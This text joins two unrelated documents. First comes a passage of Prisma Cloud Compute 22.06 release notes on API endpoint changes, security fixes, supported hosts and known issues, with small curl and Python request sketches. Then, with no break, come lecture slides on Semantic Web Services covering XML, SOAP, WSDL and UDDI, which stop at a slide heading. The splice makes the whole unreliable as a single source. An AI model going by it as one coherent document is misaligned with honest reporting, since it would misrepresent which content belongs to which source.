We compare our scan results to IronBank’s latest approved UBI8-minimal scan findings. Any discrepancies are addressed or justified. API Changes GET /stats/vulnerabilities Introduces a change in the existing API endpoint that fetches the vulnerabilities (CVEs) affecting an environment. The data for each CVE, such as impacted packages, highest severity, and so on, is now based on the entire environment irrespective of the collections filter, assigned collections, or assigned accounts. Also, the impacted resources and distribution counts are not retrieved and are returned as zero when you apply filters or are assigned specific collections or accounts. One more change in this API endpoint is that the value of the status field will now be empty. In the context of a CVE, there can be multiple fix statuses, depending on the impacted package. Therefore, providing a fix status per CVE is incorrect and was removed. To get the right fix status according to the package, use the /stats/vulnerabilities/impacted-resources endpoint to fetch the resources impacted by the CVE and their details. GET /stats/vulnerabilities/impacted-resources Introduces new optional query parameters such as pagination and resource type to the existing API endpoint. To enable backward compatibility, if you don’t use these optional query parameters, the API response will display results without pagination and without registry images, similar to the response in the previous releases (Joule or earlier). Note: Make sure to update your scripts before the Newton release. Starting with the Newton release, the API will no longer support requests without the pagination and resource type query parameters. GET /stats/vulnerabilities/download Introduces a new API endpoint that downloads a detailed report for CVEs in a CSV format. GET /stats/vulnerabilities/impacted-resources/download Introduces a new API endpoint that downloads a detailed report for impacted resources in a CSV format. 
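The two download endpoints above could be called along these lines. The Console address, credentials, and the `/api/v1` base path are assumptions (the base path follows the prefix used by other endpoints in these notes, such as `/api/v1/certs/server-certs.sh`), and the commands are built and echoed rather than executed in this sketch:

```shell
#!/bin/sh
# Hypothetical placeholders -- replace with your Console address and API credentials.
CONSOLE="https://console.example.com:8083"
AUTH="admin:password"

# Download the detailed CVE report in CSV format.
CVE_CSV_CMD="curl -s -k -u ${AUTH} ${CONSOLE}/api/v1/stats/vulnerabilities/download -o cves.csv"

# Download the detailed impacted-resources report in CSV format.
RES_CSV_CMD="curl -s -k -u ${AUTH} ${CONSOLE}/api/v1/stats/vulnerabilities/impacted-resources/download -o impacted-resources.csv"

# Printed for review rather than executed in this sketch.
echo "$CVE_CSV_CMD"
echo "$RES_CSV_CMD"
```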
PUT policies/firewall/app/out-of-band
Introduces a new API endpoint that updates or edits a WAAS custom rule for out of band traffic.

GET policies/firewall/app/out-of-band
Introduces a new API endpoint that discovers and detects the HTTP traffic for an existing WAAS out of band custom rule.

GET policies/firewall/app/out-of-band/impacted
Introduces a new API endpoint that fetches the impacted resources list for an existing WAAS out of band custom rule.

POST waas/openapi-scans
Introduces a new API endpoint that scans API definition files and generates a report of errors and shortcomings, such as structural issues, security weaknesses, and deviations from best practices. The API definition scan supports OpenAPI 2.X and 3.X definition files in either YAML or JSON format.

GET profiles/app-embedded
Introduces a new API endpoint that fetches the app-embedded runtime metadata.

GET profiles/app-embedded/download
Introduces a new API endpoint that downloads the app-embedded runtime profiles in a CSV format.

GET util/arm64/twistcli
Introduces a new API endpoint that downloads the Linux ARM64 twistcli binary in a ZIP format.

Addressed Issues
- Fixed an issue where fixedDate for Windows vulnerabilities did not update.
- The Intelligence Stream is updated to fix an issue where some Red Hat Enterprise Linux (RHEL) packages were incorrectly reported as vulnerable. This issue occurred because Red Hat had duplicate records of the same CVE in their OVAL feed, where one was fixed and the other one was not.
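A client for POST waas/openapi-scans only needs to upload the definition file. A minimal request-building sketch follows; the `/api/v1` prefix, the Content-Type choices, and the returned request shape are illustrative assumptions, so verify them against the API reference for your Console version.

```python
import pathlib

# Assumed path prefix; verify against your Console's API reference.
API_PATH = "/api/v1/waas/openapi-scans"


def build_openapi_scan_request(definition_file: str) -> dict:
    """Prepare the pieces of a POST to the API definition scan endpoint.

    The endpoint accepts OpenAPI 2.X and 3.X definitions in YAML or JSON;
    the header and request shape below are illustrative assumptions.
    """
    suffix = pathlib.Path(definition_file).suffix.lower()
    if suffix not in (".yaml", ".yml", ".json"):
        raise ValueError("API definition must be a YAML or JSON file")
    content_type = "application/json" if suffix == ".json" else "application/x-yaml"
    return {
        "method": "POST",
        "path": API_PATH,
        "headers": {"Content-Type": content_type},
    }
```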
• Security Fixes
In accordance with the security assurance policy, this release contains updates to resolve older vulnerabilities in packaged dependencies:
**Console & Defender:**
• Upgraded Go version
• Removed mongodb-tools binaries
• Containerd updates for Kubernetes (github.com/containerd/containerd)
• Open Policy Agent updates (github.com/open-policy-agent/opa)
• Runc updates (github.com/opencontainers/runc)
• Kubernetes (k8s.io/kubernetes)
• Mongod
• Mongodb Go driver (go.mongodb.org/mongo-driver)
• AWS SDK for Go (github.com/aws/aws-sdk-go)
• Dependency updates for:
• Package xz (github.com/ulikunitz/xz)
• YAML for Go package (gopkg.in/yaml.v3)
**Defender**
• github.com/docker/distribution
• github.com/tidwall/gjson
**Console**
• Dependency updates for com.google.code.gson.gson
---
**End of Support Notifications**
The following items are no longer supported in 22.06.
- Following the Red Hat EOL announcement for OpenShift 3.11, Prisma Cloud no longer supports OpenShift 3.11.
**Supported Host Operating Systems**
Prisma Cloud now supports hosts running x86 architecture on multiple platforms and hosts running ARM64 architecture on AWS. Review the full system requirements for all supported operating systems.
**x86 Architecture**
In this release, Prisma Cloud added support for the following host operating systems on x86 architecture:
- Bottlerocket OS 1.7
- Latest Amazon Linux 2
- Latest Container-Optimized OS on Google Cloud
- Ubuntu 22.04 LTS
**ARM64 Architecture**
In this release, Prisma Cloud added support for the following host operating systems on ARM64 architecture running on AWS:
- Amazon Linux 2
- Ubuntu 18.04 LTS
- Debian 10
- RHEL 8.4
- CentOS 8
- Photon OS 4
Changes in Existing Behavior
- For short-lived containers, that is, when a container is created and immediately terminated, the image will not be scanned. In previous versions, the image was scanned by monitoring pull events from the registry.
- An additional permission is added to the AWS agentless scanning template.
- For existing accounts that are enabled for agentless scans, you will need to update the permissions.
- Credentials for AWS, GCP, and Azure cloud accounts are now under Manage > Cloud Accounts.
- In 22.01 update 2, we updated how the scanning process impacts artifact metadata in JFrog Artifactory. The scanning process no longer updates the Last Downloaded date for all manifest files of all the images in the registry.
- In 22.06, we've further refined how this works:
- As part of the process for evaluating which images should be scanned, in addition to reviewing the manifest files, Prisma Cloud also examines the actual images. Now the Last Downloaded date won't change unless the image is actually pulled and scanned.
- "Transparent security tool scanning" is not supported for anything other than Local repositories. If you select anything other than Local in your scan configuration (including virtual repositories backed by local repositories), then Prisma Cloud automatically uses the Docker API to scan all repositories (local, remote, and virtual). When using Docker APIs, the Last Downloaded field in local JFrog Artifactory registries will be impacted by scanning.
- If you have a mix of local, remote, and virtual repositories, and you want to ensure that the Last Downloaded date isn't impacted by Prisma Cloud scanning, then create separate scan configurations for local repositories and remote/virtual repositories.
• The data collection for incidents in the Prisma Cloud Compute database is capped at 25,000 incidents or 50 MB, whichever limit is reached first. When upgrading from 22.01 to 22.06, if the size of your incident collection exceeds this limit, then the oldest incidents that exceed the limit are dropped. As part of this change, the serial number field for incidents will now be empty. The serial number was a running count of the incidents according to the size of the data collection.
Now that the collection is capped, the serial number is no longer available. To uniquely identify incidents, use the ID field instead.
• A new field **category** is now available for the incidents alert integration with Webhook and Splunk to identify the incident type.
• With 22.06, all App-Embedded workloads, including Fargate tasks, will be grouped together in collections using the **App ID** field. Until now, collections of Fargate tasks were specified using the **Hosts** field in vulnerability, compliance, and incidents pages. After upgrading to 22.06, update your existing collections to use the **App IDs** field rather than the **Hosts** field to maintain the correct grouping of resources for filtering, assigning permissions, and scoping vulnerability and compliance policies. Also, the CSV file export for vulnerability scan results, compliance scan results, and incidents has changed. Fargate tasks protected by App-Embedded Defender will be reported under the **Apps** column instead of the **Hosts** column.
**Known Issues**
• The `--tarball` option in twistcli does not scan for compliance checks. Currently, only vulnerabilities are detected successfully.
• When Defender is installed on Windows hosts in AWS, and Prisma Cloud Compute Cloud Discovery is configured to scan your environment for protected hosts, the Windows hosts running Defender are reported as unprotected.
• For custom compliance checks for Kubernetes and OpenShift on CRIO, when **Reported results** is configured to show both passed and failed checks, if a check doesn’t run, Prisma Cloud still reports it as **passed**.
• If you have the same custom compliance rule in use in a host policy (effect: alert) and a container policy (effect: block), the rules will enforce your policy (as expected), but the audit message for a blocked container will incorrectly refer to the host policy and host rule name.
• On Radar > Containers, K3s clusters are not displayed.
You can view the containers within these clusters under **Non-cluster containers**. **Upcoming Deprecation Notifications** • Support for Windows Server 2022 will be added with or before the next release, Lagrange. With support for Windows Server 2022, Windows Server 2016 will no longer be supported. Microsoft has announced the **EOL for Windows Server 2016** as of January, 2022. Prisma Cloud Compute Edition Release Information - Support for Docker Access Control is being deprecated along with the Access User role. Support will be removed in the Newton release. - Support for scanning your code repositories from the Prisma Cloud Compute console (Monitor > Vulnerabilities > Code repositories) is being deprecated. Twistcli for code repository scanning is also being deprecated. You can use the Code Security module on Prisma Cloud to scan code repositories and CI pipelines for misconfigurations and vulnerabilities. Support for code repo scanning using Prisma Cloud Compute will be removed in the Newton release. Backward Compatibility for New Features <table> <thead> <tr> <th>Feature name</th> <th>Unsupported Component (Defender/twistcli)</th> <th>Details</th> </tr> </thead> <tbody> <tr> <td>Support for Google Artifact Registry</td> <td>Defender</td> <td>Old defenders will not be supported for scanning Artifact Registry.</td> </tr> <tr> <td>Registry Scan Enhancements</td> <td>Defender</td> <td>A new log record was added for Defender finished scanning image, which adds pull, analysis and total duration. For older defenders, the following fields will be zero: ImagePullDuration, ImageAnalysisDuration, ImageScanDuration.</td> </tr> <tr> <td>Vulnerability and compliance for Workloads Protected by App-Embedded Defenders</td> <td>Defender</td> <td>Old app-embedded Defenders (except for ECS Fargate Defenders) will not be supported for vulnerabilities, compliance, and package info. The images running with these Defenders will not be returned in the GET images API. 
Also, for old ECS Fargate Defenders, the Environment → Apps tab within the image dialog will be empty, even though there are running tasks and their count is displayed on the main images page under the Apps column.</td> </tr>
<tr> <td>Runtime File System Audits for App-Embedded Defenders</td> <td>Defender</td> <td>Old App-Embedded Defenders cannot use the file system capability, so the workloads they protect cannot be monitored for file system events.</td> </tr>
<tr> <td>Rule to Allow Activity in Attached Sessions</td> <td>Defenders</td> <td>Old Defenders do not support the new functionality because they lack the backend implementation for this toggle.</td> </tr>
<tr> <td>Support ARM: Add vulnerabilities support for ARM to the IS ARM support</td> <td>Defenders, twistcli, Console and Intelligence Stream</td> <td>Old Defenders and Consoles do not support ARM64 because they lack the dedicated implementation. The Intelligence Stream is updated with ARM64 CVEs for all Consoles, but we expect it to be uncommon for an ARM64-specific CVE to exist for every x86 CVE. ARM64 Defenders are required to scan ARM-based images. Make sure to assign the appropriate collections in your Registry Scanning Scope for x86_64 images and ARM64 images to prevent errors in the registry scanning.
The ALL collection automatically includes the ARM64 Defenders.</td> </tr>
<tr> <td>Windows defender for Vulnerability and Compliance with Containers</td> <td>Defenders, twistcli</td> <td>Old Defenders and twistcli do not support the new functionality because they lack the updated implementation.</td> </tr>
<tr> <td>Improved Visibility for CaaS workloads protected by App-Embedded Defenders</td> <td>Defenders</td> <td>Old App-Embedded Defenders do not support the new capability of fetching workload cloud metadata into the App-Embedded profile.</td> </tr>
<tr> <td>Authenticate with Azure Container Registry using certificate</td> <td>Defenders</td> <td>Older Defenders cannot use the new certificate-based credential for registry scanning.</td> </tr>
<tr> <td>Extract Fargate task Entrypoint and Command Params, Support Fargate Task Definition in CloudFormation Template format #33033</td> <td>twistcli</td> <td>New implementation for Fargate Task defenders in twistcli.</td> </tr>
<tr> <td>Support image tar files scanning with twistcli</td> <td>twistcli</td> <td>Older twistcli versions do not have this implementation.</td> </tr>
<tr> <td>Support for Azure VMs and Containers being reported into SaaS - Unified Inventory (#tbd)</td> <td>Defender</td> <td>Defenders older than Kepler cannot report on Azure VMs because they lack support for the VM ID in the proper format.
Users will need to upgrade their Defenders to Kepler.</td> </tr> </tbody> </table>

Get Help
The following topics provide information on where to find more about this release and how to request support:
- Related Documentation
- Request Support

Related Documentation
Refer to the following documentation on the Technical Documentation portal, or search the documentation for more information on our products:
• **Prisma Cloud Administrator’s Guide (Compute)** — Provides the concepts and workflows to get the most out of the Compute service in Prisma Cloud Enterprise Edition. The Prisma Cloud Administrator’s Guide (Compute) also takes you through the initial onboarding and basic setup for securing your hosts, containers, and serverless functions.
• **Prisma Cloud Compute Edition Administrator’s Guide** — Provides the concepts and workflows to get the most out of Prisma Cloud Compute Edition, the self-hosted version of Prisma Cloud’s workload protection solution. The Prisma Cloud Compute Edition Administrator’s Guide also takes you through the initial onboarding and basic setup for securing your hosts, containers, and serverless functions.
• **Prisma Cloud Administrator’s Guide** — Provides the concepts and workflows to get the most out of the Prisma Cloud service. The Prisma Cloud Administrator’s Guide also takes you through the initial onboarding and basic setup for securing your public cloud deployments.
• **Prisma Cloud RQL Reference** — Describes how to use the Resource Query Language (RQL) to investigate incidents and then create policies based on the findings.
• **Prisma Cloud Code Security Administrator’s Guide** — Use the Code Security Guide to scan and secure your IaC templates and identify misconfigurations before you go from code to cloud.

Request Support
To contact support, get information on support programs, manage your account, or open a support case, go to the Prisma Cloud LIVE community page.
To provide feedback on the documentation, please write to us at: documentation@paloaltonetworks.com. Contact Information Corporate Headquarters: Palo Alto Networks 3000 Tannery Way Santa Clara, CA 95054 https://www.paloaltonetworks.com/company/contact-support Palo Alto Networks, Inc. www.paloaltonetworks.com
Semantic Web Services SBBD 2008 Renato Fileto Frank Siqueira Collaborators (SWS tools selection): Giorgio Merize Rodrigo Zeferino {fileto|frank|giorgio|rodrigo.zeferino}@inf.ufsc.br INE/CTC/UFSC Topics - **Introduction** - Web Services (WS) - Semantic Web (SW) - Semantic Web Services (SWS) - Some Major Efforts towards SWS - WSDL-S - OWL-S - SWSF (SWSO + SWSL) - WSMO (WSMO + WSML + WSMX) - **Software Tools:** WSMT, WSMX, IRS-III, ... - **Case study:** Travelling to SBBD Introduction Web Services Technology (discovery, selection, composition, and web-based execution of services) + Semantic Web (ontologies and machine supported data interpretation) = Semantic Web Services (integrated solution for realizing the vision of the next generation of the Web) The Web - The Web was initially designed for application to human interactions - Served very well its purpose: ◆ Information sharing: a distributed content library. ◆ Enabled B2C e-commerce. ◆ Non-automated B2B interactions. - How did it happen? ◆ Built on standards: HTTP, HTML, URI, ... ◆ Very few assumptions made about computing platforms. ◆ Ubiquity. What’s next? - The Web is everywhere. There is a lot more we can do! - E-marketplaces. - Open, automated B2B e-commerce. - Business process integration on the Web. - Resource sharing, distributed computing. - Current approach is *ad-hoc* on top of existing standards. - e.g., application-to-application interactions with HTML forms. - **Goal:** enabling systematic and automated application-to-application interaction on the Web. 
W3C’s Protocol Working Group
“...the Web can grow significantly in power and scope if it is extended to support [automated] communication between applications, from one program to another.”
W3C’s Protocol Working Group

Topics
- Introduction
- **Web Services (WS)**
- Semantic Web (SW)
- Semantic Web Services (SWS)
- Some Major Efforts towards SWS
- WSDL-S
- OWL-S
- SWSF (SWSO + SWSL)
- WSMO (WSMO + WSML + WSMX)
- **Software Tools:** WSMT, WSMX, IRS-III, ...
- **Case study:** Travelling to SBBD

Web Services
- Encapsulated, loosely coupled Web “components” that can bind dynamically to each other.
- Services are programmatically accessible over standard Internet protocols

A Web Service
- Identified by a URI
- Self-describing and openly accessible
- Can be remotely invoked through a well-defined interface
- Exchanges data in XML format
- Interacts with applications and other services via message exchange (HTTP/SMTP)
- Independent from other services and applications, but can cooperate with them

Web Service Architecture
Based on the Service Oriented Architecture (SOA). Obviously, there are other technologies for doing this. Web services standardize connections, enabling “plug and play” on the Web.

Web Service Objectives
- Universal interoperability
- Exploit ubiquity of the Web
- Enable dynamic binding
- Efficiently support the open environment (the Web) and more restricted environments if necessary
- Minimize incompatibility costs
- programming languages,
- operating systems,
- network protocols.
An effort towards building a distributed computing platform on the Web.

Why Web Services?
- Based on generally accepted standards
- Require little additional infrastructure
- Loose coupling
- Focus on messages and documents, not *APIs*
- Easy to use
- Complement existing technologies
- Interoperability
- Everybody uses them, plans to use them, or is forced to use them

Technology Evolution
[chart: granularity, coupling & abstraction; axes range from high to low abstraction, fine- to coarse-grained, high to low coupling]

Web Services Framework
- What goes “on the wire”: Formats and protocols.
- What describes what goes on the wire: Description languages.
- How to find the services we need: Discovery and selection of services.
- How to assemble and control the execution of services in processes on the Web: Composition of services.

Current Web Services Technologies
- Standards for publication, invocation & search
- Unicode, URI + namespaces
- XML (eXtensible Markup Language) + XML-Schema
- SOAP (f.k.a. Simple Object Access Protocol)
- WSDL (Web Services Description Language)
- UDDI (Universal Description, Discovery and Integration)
- Implementation technologies
- .NET (Microsoft)
- Java Technology for Web Services (SUN)
- ... and many others.

Web Service Interaction
1. Registers Service
2. Service Discovery
3. Gets Service URI
4. Asks for Description
5. Gets WSDL
6. Invokes Service
7.
Gets Response (optional)

Current Web Services Standards
- Cooperative Processes
- Semantic Web Services
- UDDI
- WSDL
- SOAP
- Internet Protocols (HTTP)
- XML + XML-Schema
- URI + NameSpaces
- Character Encoding (Unicode)
Access Control & Security Policies

Character Encoding
- `<?xml version="1.0" encoding='UTF-8'?>`
- `<?xml version="1.0" encoding='UTF-16'?>`
- `<?xml version="1.0" encoding='EUC-JP'?>`
- `<?xml version="1.0" encoding='ISO-8859-1'?>`

URI (Uniform Resource Identifier)
A URI identifies an abstract or physical resource
URNs (Uniform Resource Names)
URLs (Uniform Resource Locators)
Examples:
ftp://ftp.is.co.za/rfc/rfc1808.txt
http://www.ietf.org/rfc/rfc2396.txt
mailto:John.Doe@example.com
news:comp.infosystems.www.servers.unix
ldap://[2001:db8::7]/c=GB?objectClass?one
telnet://192.0.2.16:80/
tel:+1-816-555-1212

NameSpaces
- `<x xmlns:edi="http://ecommerce.org/schema">` `<!-- the "edi" prefix is bound to http://ecommerce.org/schema for the "x" element and contents -->` `</x>`
- `<book xmlns:isbn="urn:ISBN:0-395-36341-6">` `<title>Cheaper by the Dozen</title>` `<isbn:number>1568491379</isbn:number>` `</book>`
- `<schema xmlns="http://www.w3.org/2001/XMLSchema">` `</schema>`

XML – eXtensible Markup Language
- `<?xml version="1.0"?>` `<!DOCTYPE people SYSTEM "http://www.wsmo.org/workinggroup.dtd">` `<!-- This XML document gives information about working group members of the WSMO working group -->` `<people xmlns="http://www.wsmo.org/namespace">` `<title>WSMO working group members</title>` `<member chair="yes">` `<firstname>Dieter</firstname><lastname>Fensel</lastname>` `<affiliation>DERI International</affiliation>` `</member>` `<member chair="yes">` `<firstname>John</firstname><lastname>Domingue</lastname>` `<affiliation>Open University</affiliation>` `</member>` `<member>` `<firstname>Axel</firstname><lastname>Polleres</lastname>` `<affiliation>Univ.
Rey Juan Carlos</affiliation>` `</member>` `⋯` `</people>`

**DTD**

```xml
<!DOCTYPE people [
<!ELEMENT people (title,member+)>
<!ELEMENT member (firstname,lastname,affiliation+)>
<!ATTLIST member chair (yes|no) "no">
<!ELEMENT title (#PCDATA)>
<!ELEMENT firstname (#PCDATA)>
<!ELEMENT lastname (#PCDATA)>
<!ELEMENT affiliation (#PCDATA)>
]>
```

**XML-Schema**

An *XML-Schema* document describes:
- elements,
- attributes,
- relationships,
- etc.
that can be used in one or more XML documents, i.e., it defines a class of XML documents that follow a set of structural and data constraints
- *XML-Schema* uses the *XML* syntax
- *XML-Schema* is more robust, versatile and powerful than *DTD* (*Document Type Definition*)

XML-Schema (example)

```xml
<?xml version="1.0" encoding="UTF-8"?>
<xs:schema xmlns="http://www.wsmo.org/namespace"
    xmlns:xs="http://www.w3.org/2001/XMLSchema"
    elementFormDefault="qualified" attributeFormDefault="qualified"
    targetNamespace="http://www.wsmo.org/namespace">
  <xs:element name="people">
    <xs:complexType>
      <xs:sequence>
        <xs:element name="firstname" type="namestring" minOccurs="1" maxOccurs="2"/>
        <xs:element name="lastname" type="namestring" minOccurs="1" maxOccurs="2"/>
        <xs:element name="affiliation" type="namestring" maxOccurs="unbounded"/>
      </xs:sequence>
    </xs:complexType>
  </xs:element>
</xs:schema>
```

XML-Schema (example cont)

```xml
<xs:complexType name="person">
  <xs:sequence>
    <xs:element name="firstname" type="namestring" minOccurs="1" maxOccurs="2"/>
    <xs:element name="lastname" type="namestring" minOccurs="1" maxOccurs="2"/>
    <xs:element name="affiliation" type="namestring" maxOccurs="unbounded"/>
  </xs:sequence>
  <xs:attribute name="chair" default="no">
    <xs:simpleType>
      <xs:restriction base="xs:string">
        <xs:enumeration value="yes"/>
        <xs:enumeration value="no"/>
      </xs:restriction>
    </xs:simpleType>
  </xs:attribute>
</xs:complexType>
```

XML-Schema (example cont)

```xml
<xs:simpleType name="namestring">
  <xs:restriction base="xs:string">
    <!-- This pattern
         says that names are strings starting with an uppercase letter -->
    <xs:pattern value="\p{Lu}.*"/>
  </xs:restriction>
</xs:simpleType>
```

Validating XML Documents
- **Well-formed document**: satisfies the restrictions expressed in the XML specification (http://www.w3.org/TR/2004/REC-xml-20040204)
- **Valid document**: satisfies the restrictions expressed in a schema specification (valid elements, attributes, nesting, etc.) written in DTD or XML-Schema and associated with the XML document

Request example

```xml
<?xml version="1.0" encoding="UTF-8"?>
<S:Envelope xmlns:S="http://schemas.xmlsoap.org/soap/envelope/">
  <S:Header/>
  <S:Body xmlns:ns1="http://ufsc.br/previsao">
    <ns1:getMinTemperature>
      <location>Florianópolis</location>
    </ns1:getMinTemperature>
  </S:Body>
</S:Envelope>
```

**SOAP**
- **Return example**

```xml
<?xml version="1.0" encoding="UTF-8"?>
<S:Envelope xmlns:S="http://schemas.xmlsoap.org/soap/envelope/">
  <S:Body>
    <ns1:getMinTemperatureResponse xmlns:ns1="http://ufsc.br/previsao">
      <return>13.2</return>
    </ns1:getMinTemperatureResponse>
  </S:Body>
</S:Envelope>
```

**SOAP + attachments**

MIME-Version: 1.0
Content-Type: Multipart/Related; boundary=MIME_boundary; type=text/xml; start="<soapmsg.xml@example.com>"
--MIME_boundary
Content-Type: text/xml; charset=UTF-8
Content-Transfer-Encoding: 8bit
Content-ID: <soapmsg.xml@example.com>

```xml
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
  <SOAP-ENV:Body>
    <Person>
      <Picture href="http://example.com/myPict.jpg" />
    </Person>
  </SOAP-ENV:Body>
</SOAP-ENV:Envelope>
--MIME_boundary--
```

WSDL - Web Services Description Language
- Language for describing Web services
- W3C Standard
- XML based
- Describes the interface of a Web service
- Equivalent to CORBA IDL description
- Platform-independent description
- Extensible language
- A de facto industry standard.

Using WSDL
- Allows tools to generate compatible client and server stubs.
- Allows industries to define standardized service interfaces.
- Allows advertisement of service descriptions, enabling dynamic discovery and binding of compatible services.
- Provides a normalized description of heterogeneous applications.

WSDL Structure
- **portType**
- Abstract definition of a service (set of operations)
- **Multiple bindings per portType:**
- How to access it
- SOAP, JMS, direct call
- **Ports**
- Where to access it

WSDL elements
- **Types:** type definitions using *XML-Schema*
- **Messages:** describes what goes on the data flows, using the types defined using *XML-Schema*
- **Port types:** collections of related operations, using messages to exchange arguments and results
- **Bindings:** associate port types with protocols (e.g., HTTP GET/POST) and data formats
- **Ports:** associate bindings with network addresses
- **Services:** collection of related ports

Example: Shopping Cart WSDL definitions

```xml
<definitions name="ShoppingCartDefinitions"
    targetNamespace="http://example.com/ShoppingCart.wsdl"
    xmlns:tns="http://example.com/ShoppingCart.wsdl"
    xmlns:xsd1="http://example.com/ShoppingCart.xsd"
    xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"
    xmlns="http://schemas.xmlsoap.org/wsdl/">
```

A WSDL document

```xml
<definitions name="ShoppingCartDefinitions"
    xmlns="http://schemas.xmlsoap.org/wsdl/"
    targetNamespace="http://example.com/ShoppingCart.wsdl" … >
  <types> … </types>
  <message name="AddItemInput"> … </message>
  <message name="AddItemOutput"> … </message>
  <portType name="ShoppingCart"> … </portType>
  <binding name="CartHTTPXMLBinding" type="tns:ShoppingCart">…
  <binding name="CartSOAPBinding" type="tns:ShoppingCart">…
  <service name="ShoppingCartService">
    <port name="HTTPXMLCart" binding="tns:CartHTTPXMLBinding"> …
    <port name="SOAPCart" binding="tns:CartSOAPBinding"> …
  </service>
  <import namespace="..."
location="..."/> </definitions> ```

Types

```xml
<types>
  <schema targetNamespace="http://myservice.net/carttypes"
      xmlns="http://www.w3.org/2000/10/XMLSchema">
    <complexType name="item"><all>
      <element name="description" type="xsd:string"/>
      <element name="quantity" type="xsd:integer"/>
      <element name="price" type="xsd:float"/>
    </all></complexType>
  </schema>
</types>
```

**Messages**

```xml
<message name="AddItemInput">
  <part name="cart-id" type="xsd:string"/>
  <part name="item" type="carttypes:item"/>
  <part name="image" type="xsd:base64Binary"/>
</message>
```

**Port Types**

```xml
<portType name="ShoppingCart">
  <operation name="AddItem">
    <input message="tns:AddItemInput"/>
    <output message="tns:ACK"/>
    <fault name="BadCartID" message="tns:BadCartID"/>
    <fault name="ServiceDown" message="tns:ServiceDown"/>
  </operation>
  <operation name="RemoveItem"/>
  <operation name="ListItems"/>
</portType>
```

**SOAP Binding**

```xml
<binding name="CartHTTPSOAPBinding" type="tns:ShoppingCart">
  <soap:binding style="rpc" transport="http://schemas.xmlsoap.org/soap/http"/>
  <operation name="AddItem">
    <soap:operation soapAction="http://myservice.net/cart/AddItem"/>
    <input>
      <soap:body use="encoded" namespace="http://myservice.net/cart"
          encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"/>
    </input>
    <output>
      <soap:body use="encoded" namespace="http://myservice.net/cart"
          encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"/>
    </output>
    <fault name="BadCartID">
      <soap:body use="encoded" namespace="http://myservice.net/cart"
          encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"/>
    </fault>
    <fault name="ServiceDown">
      <soap:body use="encoded" namespace="http://myservice.net/cart"
          encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"/>
    </fault>
  </operation>
</binding>
```

**HTTP Binding** ```xml <binding name="CartHTTPPostBinding" type="tns:ShoppingCart"> <http:binding verb="POST"/> <operation name="AddItem"> <http:operation location="/AddItem"/> <input> <mime:content
type="application/x-www-form-urlencoded"/> </input> <output> <mime:content type="application/x-www-form-urlencoded"/> </output> <fault name="BadCartID"> <mime:mimeXml/> </fault> <fault name="ServiceDown"> <mime:content type="application/x-www-form-urlencoded"/> </fault> </operation> </binding> ```

Ports

```xml
<port name="SOAPCart" binding="tns:SOAPCartBinding">
  <soap:address location="http://myservice.net/soap/cart"/>
</port>
<port name="HTTPPostCart" binding="tns:HTTPPostCartBinding">
  <http:address location="http://myservice.net/cart"/>
</port>
```

Services

```xml
<service name="ShoppingCartService">
  <documentation>A Shopping Cart for the Web</documentation>
  <port name="HTTPPostCart" binding="tns:HTTPPostCartBinding">
    <http:address location="http://myservice.net/cart"/>
  </port>
  <port name="SOAPCart" binding="tns:SOAPCartBinding">
    <soap:address location="http://myservice.net/soap/cart"/>
  </port>
</service>
```

UDDI

- Defines the operation of a service registry:
  - Data structures for registering
    - Businesses
    - Technical specifications: a tModel is a keyed reference to a technical specification
    - Services and service endpoints: referencing the supported tModels
  - SOAP access API
- Rules for the operation of a global registry
- "Private" UDDI nodes are likely to appear, though.

UDDI Basic Structure

[Figure: an example businessEntity (key XY323eS472384wZ2f3100293, "Harbour Flowers", www.harbourflowersltd.co.au, "Serving Inner Sydney Harbour for ...") with an identifierBag holding keyedReferences to taxonomies (EE123 / NAICS 02417, DFE-2B / DUNS 45231), contacts (Peter Smythe, 872-6651, 4281 King's Blvd, Sydney, NSW, Petersmythe22@hotmail.com), and a businessService (key 23701e54683nf..., "Online catalog", "Website where you can ...") whose bindingTemplate (key 352041263-44EE..., access point http://www.sydneynet/hamour...) contains tModelInstanceDetails with tModelInstanceInfo entries (e.g., 4453DFC-223C-3ED6...)]
- tModel references, each with a unique identifier

---

SOAP API for UDDI

**Inquiry API**
- Search
  - find_business
  - find_service
  - find_binding
  - find_tModel
- Detail queries
  - get_businessDetail
  - get_serviceDetail
  - get_bindingDetail
  - get_tModelDetail

**Publication API**
- Addition
  - save_business
  - save_service
  - save_binding
  - save_tModel
- Removal
  - delete_business
  - delete_service
  - delete_binding
  - delete_tModel
- Security
  - get_authToken
  - discard_authToken

Major Challenges in Web Services

- **Discovery**: find available resources on the Web that meet specific needs
- **Selection**: choose the most suitable resources, by several criteria (e.g., cost, matching interfaces)
- **Composition**: design, enact and synchronize ("choreograph") distributed processes on the Web, using Web services as basic building blocks

Topics

- Introduction
- Web Services (WS)
- Semantic Web (SW)
- Semantic Web Services (SWS)
- Some Major Efforts towards SWS
  - WSDL-S
  - OWL-S
  - SWSF (SWSO + SWSL)
  - WSMO (WSMO + WSML + WSMX)
- Software Tools: WSMT, WSMX, IRS-III, ...
- Case study: Travelling to SBBD

WS standards lack semantics!

Problem: no way to describe service and data semantics for machine processing, in order to support automated service discovery, selection, composition, ...
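The discovery problem can be made concrete with a small sketch (all operation names, the registry entries, and the `ont:` concept identifiers are hypothetical, invented for illustration): two operations with identical syntactic signatures and different spellings can only be grouped through a shared ontology concept, not through keyword matching over their names.

```python
# Toy registry of purely syntactic (WSDL-style) operation descriptions.
services = [
    {"operation": "getMinTemperature", "input": "string", "output": "float"},
    {"operation": "lowestTemp",        "input": "string", "output": "float"},
    {"operation": "getStockQuote",     "input": "string", "output": "float"},
]

# Hypothetical semantic annotations: each operation references an ontology concept.
annotations = {
    "getMinTemperature": "ont:TemperatureForecast",
    "lowestTemp":        "ont:TemperatureForecast",
    "getStockQuote":     "ont:StockPrice",
}

def syntactic_match(keyword, services):
    """Keyword matching over operation names misses differently named services."""
    return [s["operation"] for s in services
            if keyword.lower() in s["operation"].lower()]

def semantic_match(concept, services):
    """Concept-based matching finds every service annotated with the concept."""
    return [s["operation"] for s in services
            if annotations.get(s["operation"]) == concept]

print(syntactic_match("temperature", services))            # finds only one service
print(semantic_match("ont:TemperatureForecast", services)) # finds both forecast services
```

Note that both forecast operations even share the same input and output types, so type-based matching would not separate them from the stock-quote service either; only the annotation does.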
Deficiencies of WS Technology

